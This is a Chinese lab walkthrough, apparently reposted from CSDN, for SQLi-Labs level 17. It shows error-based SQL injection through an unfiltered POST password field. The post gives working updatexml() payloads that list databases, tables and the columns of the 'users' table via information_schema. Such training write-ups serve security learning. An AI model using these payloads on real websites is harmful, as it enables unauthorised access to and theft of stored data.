SQLi LABS Less-17

举报
士别三日wyx 发表于 2021/12/23 01:06:10 2021/12/23
【摘要】 第十七关请求方式为POST请求 , 注入点为 单引号字符型注入 , 注入方式为 报错注入   第一步,判断注入类型 先看源码 用户名会过滤特殊字符 , 但密码没有过滤 , 但需要用户名正确才能执行修改密码的SQL 输入正确的用户名,密码处输入 1' and updatexml(1,'~',3) # u...

第十七关请求方式为POST请求 , 注入点为 单引号字符型注入 , 注入方式为 报错注入

 

第一步,判断注入类型

先看源码

用户名会过滤特殊字符 , 但密码没有过滤 , 但需要用户名正确才能执行修改密码的SQL

输入正确的用户名,密码处输入

1' and updatexml(1,'~',3) #
 

updatexml() , 第2个参数包含特殊符号时,会报错并在错误信息中显示第2个参数的内容

报错信息正常展示 , 固 错误注入

 

第二步,获取所有数据库

查询information_schema默认数据库的schemata表的schema_name字段 , 该字段保存了所有数据库名字


  
  1. 1' and updatexml(1,concat('~',
  2. substr(
  3. (select group_concat(schema_name)
  4. from information_schema.schemata)
  5. ,50,31)
  6. ),3) #

下一步,根据security数据库,获取其所有表

 

第三步,获取所有表

查询information_schema默认数据库的tables表的table_name字段 , 该字段保存了所有表名


  
  1. 1' and updatexml(1,concat('~',
  2. substr(
  3. (select group_concat(table_name)
  4. from information_schema.tables
  5. where table_schema='security')
  6. ,1,31)
  7. ),3) #

users为用户表 , 下一步根据users表 获取其所有字段

 

第四步,获取所有字段

查询information_schema默认数据库的columns表的column_name字段 , 该字段保存了所有字段名


  
  1. 1' and updatexml(1,concat('~',
  2. substr(
  3. (select group_concat(column_name)
  4. from information_schema.columns
  5. where table_schema='security'
  6. and table_name='users')
  7. ,1,31)
  8. ),3) #

 

 

 

 

 

 

 

 

文章来源: blog.csdn.net,作者:士别三日wyx,版权归原作者所有,如需转载,请联系作者。

原文链接:blog.csdn.net/wangyuxiang946/article/details/118118155

【版权声明】本文为华为云社区用户转载文章,如果您发现本社区中有涉嫌抄袭的内容,欢迎发送邮件进行举报,并提供相关证据,一经查实,本社区将立刻删除涉嫌侵权内容,举报邮箱: cloudbbs@huaweicloud.com
  • 点赞
  • 收藏
  • 关注作者

评论(0

0/1000
抱歉,系统识别当前为高风险访问,暂不支持该操作

全部回复

上滑加载中

设置昵称

在此一键设置昵称,即可参与社区互动!

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。